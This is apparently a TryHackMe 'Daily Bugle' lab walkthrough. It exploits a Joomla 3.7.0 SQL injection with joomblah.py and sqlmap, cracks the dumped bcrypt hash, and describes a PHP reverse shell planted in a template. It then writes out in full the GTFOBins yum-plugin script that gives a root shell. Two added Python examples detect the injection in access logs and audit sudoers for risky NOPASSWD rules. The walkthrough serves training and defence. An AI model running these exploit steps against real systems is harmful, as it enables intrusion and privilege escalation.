TryHackMe: Exploiting Joomla 3.7.0: Daily Bugle Walkthrough

Oct 28, 2025 • 4 min read • Intermediate

Daily Bugle turned out to be a straightforward box that demonstrates classic Joomla exploitation and privilege escalation via yum. The machine runs CentOS with a vulnerable Joomla instance that makes for quick initial access.

Enumeration

The nmap scan showed three open ports: SSH on 22, HTTP on 80, and MySQL on 3306, though the database rejected external connections.

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.6.40)
|_http-generator: Joomla! - Open Source Content Management
| http-robots.txt: 15 disallowed entries 
| /joomla/administrator/ /administrator/ /bin/ /cache/ 
3306/tcp open  mysql   MariaDB (unauthorized)

The HTTP generator tag immediately identified Joomla, and the robots.txt file confirmed an /administrator directory. Browsing to the site showed a Daily Bugle themed page with an article claiming Spider-Man robbed a bank.

SQL Injection in Joomla 3.7.0

After confirming it was Joomla, I needed to identify the version. Joomla 3.7.0 has a well-known SQL injection vulnerability in the com_fields component. I pulled down the joomblah.py exploit from stefanlucas’s GitHub repo, which automates extracting the user database.

python joomblah.py http://10.10.242.106

The script dumped the users table and pulled back credentials for the admin account.

[-] Fetching CSRF token
[-] Testing SQLi
 -  Found table: fb9j5_users
 -  Extracting users from fb9j5_users
[$] Found user ['811', 'Super User', 'jonah', '[email protected]', '$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm', '', '']

I also ran sqlmap to verify the injection point and experiment with automated extraction. Sqlmap confirmed the error-based SQL injection in the list[fullordering] parameter.

Parameter: list[fullordering] (GET)
    Type: error-based
    Title: MySQL >= 5.0 error-based - Parameter replace (FLOOR)
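Detection logic for the injection point above, run over constructed Apache access-log lines (an added example, not part of the original walkthrough or of joomblah/sqlmap). The combined log format and the whitelist of benign list[fullordering] values ("a.id ASC" style) are assumptions; anything else in that parameter on a com_fields request is flagged.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Apache combined log format (assumed); only client, timestamp, request path and status are used.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# A legitimate Joomla list ordering looks like "a.id ASC" or "a.ordering DESC" (assumed whitelist).
BENIGN_ORDERING = re.compile(r'^[a-z_]+\.[a-z_]+ (?:asc|desc)$', re.IGNORECASE)

def parse_line(line):
    """Split one access-log line into its fields; returns None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group('path'))
    # parse_qs percent-decodes names and values, so list%5Bfullordering%5D becomes list[fullordering]
    params = parse_qs(url.query, keep_blank_values=True)
    return {'ip': m.group('ip'), 'ts': m.group('ts'), 'status': int(m.group('status')), 'params': params}

def suspicious_ordering(entry):
    """Return the offending list[fullordering] value for a com_fields request, else None."""
    params = entry['params']
    if params.get('option') != ['com_fields']:
        return None
    for value in params.get('list[fullordering]', []):
        if not BENIGN_ORDERING.match(value.strip()):
            return value
    return None

def scan_log(text):
    """Return (ip, timestamp, status, value) for every request that looks like the com_fields injection."""
    findings = []
    for line in text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        bad = suspicious_ordering(entry)
        if bad is not None:
            findings.append((entry['ip'], entry['ts'], entry['status'], bad))
    return findings

# Constructed sample: one normal list request, one injection probe (error-based, hence the 500), one unrelated page view.
SAMPLE_LOG = """\
10.0.0.5 - - [28/Oct/2025:10:01:02 +0000] "GET /index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=a.id%20ASC HTTP/1.1" 200 5123
10.0.0.9 - - [28/Oct/2025:10:03:44 +0000] "GET /index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=%28SELECT%201%29 HTTP/1.1" 500 1203
10.0.0.7 - - [28/Oct/2025:10:04:10 +0000] "GET /index.php?option=com_content&view=article&id=1 HTTP/1.1" 200 8890
"""
```

A burst of such hits from one client, most returning 500, is the footprint sqlmap leaves when it confirms the error-based injection.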

Cracking the Hash

The bcrypt hash went into John the Ripper. I tried CrackStation first but it didn’t have the hash in its database, so John with rockyou.txt was the next step.

1
john --format=bcrypt --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

John cracked it and returned the password: spiderman123.

Getting Code Execution

With admin credentials for Joomla, getting a shell was straightforward. I logged into the admin panel and navigated to the template editor. Joomla templates run PHP, so I dropped a PHP reverse shell into the index.php file of the active template.

After setting up a netcat listener and triggering the template by browsing to the homepage, I got a shell back as the apache user.

Privilege Escalation Path

Once I had a shell, I ran linpeas to enumerate privilege escalation vectors. The scan revealed a non-default user named jjameson and showed that apache could run yum as root without a password.

Searching the environment and configuration files also turned up a database password, nv5uz9r3ZEDzVjNu, which worked for SSH access as jjameson and gave me a more stable shell and access to the user flag.

User jjameson may run the following commands on dailybugle:
    (ALL) NOPASSWD: /usr/bin/yum

Exploiting Yum for Root

GTFOBins has a documented method for exploiting yum when you can run it with sudo. The approach involves creating a malicious yum plugin that executes arbitrary code when yum loads it.

I created a temporary directory and set up the plugin configuration.

TF=$(mktemp -d)
cat >$TF/x<<EOF
[main]
plugins=1
pluginpath=$TF
pluginconfpath=$TF
EOF

cat >$TF/y.conf<<EOF
[main]
enabled=1
EOF

cat >$TF/y.py<<EOF
import os
import yum
from yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE
requires_api_version='2.1'
def init_hook(conduit):
  os.execl('/bin/sh','/bin/sh')
EOF

sudo yum -c $TF/x --enableplugin=y

Running this spawned a root shell immediately. From there, I grabbed the root flag and wrapped up the box.

Quick Takeaways

The SQL injection in Joomla 3.7.0 is trivial to exploit with existing tools. The joomblah script made extraction fast, though sqlmap works just as well if you want more control over the injection process.

The yum privilege escalation is a good reminder that package managers and similar system utilities can be dangerous when combined with overly permissive sudo rules. The same principle applies to apt, pip, gem, and other package managers that can execute arbitrary code.
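An audit for the overly permissive sudo rules this takeaway warns about, as an added example that is not part of the original walkthrough: it parses sudoers-style rules and flags NOPASSWD entries that hand root-level execution to a package manager. The rule parser is simplified (a tag such as NOPASSWD: is applied to the whole rule rather than per command), the list of risky binaries beyond the ones named above is an assumption, and the sudoers excerpt is constructed.

```python
import os
import re

# Utilities the takeaway names (yum, apt, pip, gem) plus dnf, apt-get and pip3 (added by assumption).
RISKY_BINARIES = {"yum", "dnf", "apt", "apt-get", "pip", "pip3", "gem"}
# sudoers user specification: who host=(runas) [TAG:] command[, command...]
RULE_RE = re.compile(r'^(?P<who>\S+)\s+(?P<host>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<cmds>.+)$')

def parse_rule(line):
    """Parse one sudoers line; returns None for comments, blanks, Defaults and alias lines."""
    line = line.split('#', 1)[0].strip()
    m = RULE_RE.match(line)
    if not m or m.group('who') == 'Defaults' or m.group('who').endswith('_Alias'):
        return None
    tags, commands = set(), []
    for spec in m.group('cmds').split(','):
        spec = spec.strip()
        # Simplification: a tag such as NOPASSWD: is recorded for the whole rule, not per command.
        while ':' in spec and spec.split(':', 1)[0].isupper():
            tag, spec = spec.split(':', 1)
            tags.add(tag.strip())
            spec = spec.strip()
        commands.append(spec.split()[0] if spec else spec)   # keep the binary, drop its arguments
    runas = (m.group('runas') or 'root').split(':')[0].strip()   # sudoers default runas user is root
    return {'who': m.group('who'), 'runas': runas, 'tags': tags, 'commands': commands}

def risky_nopasswd(rule):
    """Commands in this rule that grant passwordless root execution, via ALL or a risky binary."""
    if rule is None or 'NOPASSWD' not in rule['tags'] or rule['runas'] not in ('ALL', 'root'):
        return []
    return [c for c in rule['commands'] if c == 'ALL' or os.path.basename(c) in RISKY_BINARIES]

def audit(sudoers_text):
    """Return (user, [commands]) for every rule that needs attention."""
    findings = []
    for line in sudoers_text.splitlines():
        rule = parse_rule(line)
        hits = risky_nopasswd(rule)
        if hits:
            findings.append((rule['who'], hits))
    return findings

# Constructed sudoers excerpt; the jjameson line mirrors the sudo -l output shown earlier.
SAMPLE_SUDOERS = """\
root      ALL=(ALL)       ALL
jjameson  ALL=(ALL) NOPASSWD: /usr/bin/yum
backup    ALL=(root) NOPASSWD: /usr/bin/rsync, /usr/bin/apt-get
deploy    ALL=(ALL) /usr/bin/pip
www-data  ALL=(www-data) NOPASSWD: /usr/bin/gem
"""
```

Rules that still require a password, or that run as a non-root user, are not reported; a NOPASSWD rule for ALL is reported as the root grant it is.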

Credential reuse continues to be effective. The database password working for SSH access as jjameson simplified lateral movement and gave me a cleaner shell to work from.

What’s Next

I’m working through more of the intermediate TryHackMe boxes. Daily Bugle was quick and straightforward, but I want to tackle boxes with more modern defensive configurations and see how enumeration strategies change when you’re dealing with better-hardened systems.

Resources to Get You Started

Joomla 3.7.0 SQL Injection Exploit (GitHub, updated 2017)
The joomblah.py script used in this walkthrough, which automates extracting user credentials from vulnerable Joomla 3.7.0 installations via SQL injection.

GTFOBins Yum Privilege Escalation (GTFOBins, regularly updated)
Comprehensive documentation of methods to exploit yum for privilege escalation, including the plugin-based approach used on this box.

Joomla Security Resources (Joomla Documentation, regularly updated)
Official Joomla hardening guide covering version management, file permissions, and security best practices to prevent the types of vulnerabilities exploited here.